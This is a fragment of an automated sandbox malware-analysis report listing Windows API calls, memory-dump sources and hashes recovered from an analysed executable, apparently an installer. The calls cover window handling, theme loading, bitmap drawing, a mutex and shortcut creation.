                                                                                  • IsIconic.USER32(?), ref: 004241F4
                                                                                  • SetActiveWindow.USER32(?,?,?,?,0046CE53), ref: 00424201
                                                                                    • Part of subcall function 0042365C: ShowWindow.USER32(00410470,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                    • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021225AC,0042421A,?,?,?,?,0046CE53), ref: 00423B5F
                                                                                  • SetFocus.USER32(00000000,?,?,?,?,0046CE53), ref: 0042422E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                                  • String ID:
                                                                                  • API String ID: 649377781-0
                                                                                  • Opcode ID: 2caf509772b4e47572ac949d7f8b8f9ae0a5a4117a3619920a2f1982222ed166
                                                                                  • Instruction ID: c379361f86f494b348edbf52cdf1d5c809bfbf5168ad2d96a2c3ff14c6914fef
                                                                                  • Opcode Fuzzy Hash: 2caf509772b4e47572ac949d7f8b8f9ae0a5a4117a3619920a2f1982222ed166
                                                                                  • Instruction Fuzzy Hash: B3F0DA717002209BDB10AFAAD8C5B9676A8EF48344B5541BBBD09DF35BCA7CDC018768
                                                                                  APIs
                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 0042EE35
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000001), ref: 0042EE45
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042EE6D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                                  • String ID:
                                                                                  • API String ID: 3525989157-0
                                                                                  • Opcode ID: e535240892797685b4ab9d9c929302bfb3a48c93a5258e40853e85be58f26cad
                                                                                  • Instruction ID: b330794617a7040f76ad0da05c7b1ee5a1856395dd3e8d048ce20caf316d4231
                                                                                  • Opcode Fuzzy Hash: e535240892797685b4ab9d9c929302bfb3a48c93a5258e40853e85be58f26cad
                                                                                  • Instruction Fuzzy Hash: 18E0C0B16443007EE200EE758C82F5F76DCDB48714F00483AB654DB1C1E679D9489B96
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00417D1F
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Placement$Iconic
                                                                                  • String ID:
                                                                                  • API String ID: 568898626-0
                                                                                  • Opcode ID: 1c91201d2ff36bc72c7178dd8424e8fae2c9e4961405fe597c6cb80dc68efef3
                                                                                  • Instruction ID: ae07cbcaee7307856f0de191e02e21b90635fd34b211f34cef32728ab7ec892e
                                                                                  • Opcode Fuzzy Hash: 1c91201d2ff36bc72c7178dd8424e8fae2c9e4961405fe597c6cb80dc68efef3
                                                                                  • Instruction Fuzzy Hash: 2A017C31204108ABCB10EE59E8C1EEA73A8AF44324F054567FD08CF242D638ECC087A8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CaptureIconic
                                                                                  • String ID:
                                                                                  • API String ID: 2277910766-0
                                                                                  • Opcode ID: a20d27f3b2ac0a1b3fa2ab67efc932bc7606427269a1e4b5a38f9b3ed8bb9e72
                                                                                  • Instruction ID: 8b244cfd74e2e9025fb133a269c9ff628bd031c9e89e3e616ef14db29f4eec50
                                                                                  • Opcode Fuzzy Hash: a20d27f3b2ac0a1b3fa2ab67efc932bc7606427269a1e4b5a38f9b3ed8bb9e72
                                                                                  • Instruction Fuzzy Hash: CBF06232304A024BDB31A72EC885AEB62F59F88368B24443FE419C7765EB7CDCD58758
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 004241AB
                                                                                    • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                    • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                    • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                    • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                  • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                    • Part of subcall function 0042365C: ShowWindow.USER32(00410470,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2671590913-0
                                                                                  • Opcode ID: 6a9b997a6a6cf91003675646eaf443a00e7e2891d5b78c90ff096ed1e4918312
                                                                                  • Instruction ID: b7d9458b5e0a659a50abb462337f5bae1697c0dc3d856a04b5cc34dfb433b66f
                                                                                  • Opcode Fuzzy Hash: 6a9b997a6a6cf91003675646eaf443a00e7e2891d5b78c90ff096ed1e4918312
                                                                                  • Instruction Fuzzy Hash: 6CE01AA470010187DF00EFAADCC9B9632A8BF48304F55057ABC08CF24BDA3CC950C728
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 8e873b8b5c82bc258c14262f025a038593852d0d4569c028c12fccb2f86baf91
                                                                                  • Instruction ID: e2daaee124a258af88011e7d59d1a34290a71591709d5bbd6185ea02eebcb9ba
                                                                                  • Opcode Fuzzy Hash: 8e873b8b5c82bc258c14262f025a038593852d0d4569c028c12fccb2f86baf91
                                                                                  • Instruction Fuzzy Hash: D851F6356082058FC710DB6AD681A9BF3E5FF98314B2482BBD824C7391D7B8EDA1C759
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047904A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 2acbb7ee23148c44530fb96b869e7794becc65d69925435b63a344be70e19465
                                                                                  • Instruction ID: a31957f8146ee59bbe5f7cc321da5d64c206ff61d5be307610cda5dda3fb314a
                                                                                  • Opcode Fuzzy Hash: 2acbb7ee23148c44530fb96b869e7794becc65d69925435b63a344be70e19465
                                                                                  • Instruction Fuzzy Hash: 7C413575614144EFDB10CF9DC6858AAB7F6FB48310B24C996E84CDB301D739EE419B54
                                                                                  APIs
                                                                                  • ArcFourCrypt._ISCRYPT(?,?,?,0046DFA4,?,?,0046DFA4,00000000), ref: 0045D2EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptFour
                                                                                  • String ID:
                                                                                  • API String ID: 2153018856-0
                                                                                  • Opcode ID: f72980deaa919cf0bcca330c95d094571c0b9ac3099722338076af053f3dc2d8
                                                                                  • Instruction ID: b6c4cc1f99ef2e52d606a12bd82df8b216d3beaef2de20ba66a0ab70ac2c171e
                                                                                  • Opcode Fuzzy Hash: f72980deaa919cf0bcca330c95d094571c0b9ac3099722338076af053f3dc2d8
                                                                                  • Instruction Fuzzy Hash: 81C09BF240420C7F65005795ECC9C77B75CE6586547404136F704831019572AC104574
                                                                                  APIs
                                                                                  • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DC14,?,0046DDF5), ref: 0045D302
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptFour
                                                                                  • String ID:
                                                                                  • API String ID: 2153018856-0
                                                                                  • Opcode ID: f277e602d1aa1d933ca60749d28492a83cf7560ca7b8b7592fc74e5de38efb5e
                                                                                  • Instruction ID: 163ad57823698c1276c601513e35adbc52e9ec482f3283ddef75a5d9e9809592
                                                                                  • Opcode Fuzzy Hash: f277e602d1aa1d933ca60749d28492a83cf7560ca7b8b7592fc74e5de38efb5e
                                                                                  • Instruction Fuzzy Hash: 86A002F0F803007AFD2057615E0EF26252D97D0F05F2044757306EA0D085A5A401852C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3373763009.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3373698152.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3373799669.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                  • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                  • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                  • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3373763009.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3373698152.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3373799669.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                  • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                  • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                    • Part of subcall function 0044B678: GetVersionExA.KERNEL32(00000094), ref: 0044B695
                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F7E9,004992CA), ref: 0044B6F3
                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B70B
                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B71D
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B72F
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B741
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B753
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B765
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B777
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B789
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B79B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B7AD
                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B7BF
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B7D1
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B7E3
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B7F5
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B807
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B819
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B82B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B83D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B84F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B861
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B873
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B885
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B897
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B8A9
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B8BB
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B8CD
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B8DF
                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B8F1
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B903
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B915
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B927
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B939
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B94B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B95D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B96F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B981
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B993
                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B9A5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B9B7
                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B9C9
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B9DB
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B9ED
                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B9FF
                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044BA11
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044BA23
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044BA35
                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044BA47
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                  • API String ID: 1968650500-2910565190
                                                                                  • Opcode ID: a839ccb9c9a861a6ca06feeaf4f5b9cf9d009b24b8deb6d9a0dd113e88dab802
                                                                                  • Instruction ID: 8a2f9fdf968ae37fa3cb46079294691732ee00746fcb1dbbaee87679a149b2ae
                                                                                  • Opcode Fuzzy Hash: a839ccb9c9a861a6ca06feeaf4f5b9cf9d009b24b8deb6d9a0dd113e88dab802
                                                                                  • Instruction Fuzzy Hash: D59153F0A40B51EBEB00EBB59CC6A2A37A8EB15B1471415BBB480EF295D778DC048F5D
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0041CA50
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0041CA5C
                                                                                  • CreateBitmap.GDI32(0041A954,?,00000001,00000001,00000000), ref: 0041CA80
                                                                                  • CreateCompatibleBitmap.GDI32(?,0041A954,?), ref: 0041CA90
                                                                                  • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                  • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                  • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                  • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                  • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0041CB3B
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                  • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB84
                                                                                  • RealizePalette.GDI32(00000000), ref: 0041CB8D
                                                                                  • SelectPalette.GDI32(0041CE4C,00000000,00000001), ref: 0041CB9C
                                                                                  • RealizePalette.GDI32(0041CE4C), ref: 0041CBA5
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                  • BitBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020), ref: 0041CBF1
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                    • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                  • String ID:
                                                                                  • API String ID: 269503290-0
                                                                                  • Opcode ID: cce4914916f1a7239ac88c37909b2d3847b69fcced41e26916e06273e7ac86df
                                                                                  • Instruction ID: 4a976381369a00188f54b32674623e6c4b83415f3a667354aa154cca89d68730
                                                                                  • Opcode Fuzzy Hash: cce4914916f1a7239ac88c37909b2d3847b69fcced41e26916e06273e7ac86df
                                                                                  • Instruction Fuzzy Hash: 2C61EE71A44608AFDB10EBE9DC86FDFB7B8EF49704F14446AB504E7281D67CA940CB68
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(0049AA74,00000000,00000001,0049A774,?,00000000,00456A8B), ref: 00456726
                                                                                  • CoCreateInstance.OLE32(0049A764,00000000,00000001,0049A774,?,00000000,00456A8B), ref: 0045674C
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00456903
                                                                                  Strings
                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 00456972
                                                                                  • IPropertyStore::Commit, xrefs: 0045698B
                                                                                  • {pf32}\, xrefs: 004567C6
                                                                                  • IPersistFile::Save, xrefs: 00456A0A
                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 004568E8
                                                                                  • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 00456865
                                                                                  • CoCreateInstance, xrefs: 00456757
                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 00456899
                                                                                  • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004569AC
                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045693A
                                                                                  • %ProgramFiles(x86)%\, xrefs: 004567D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
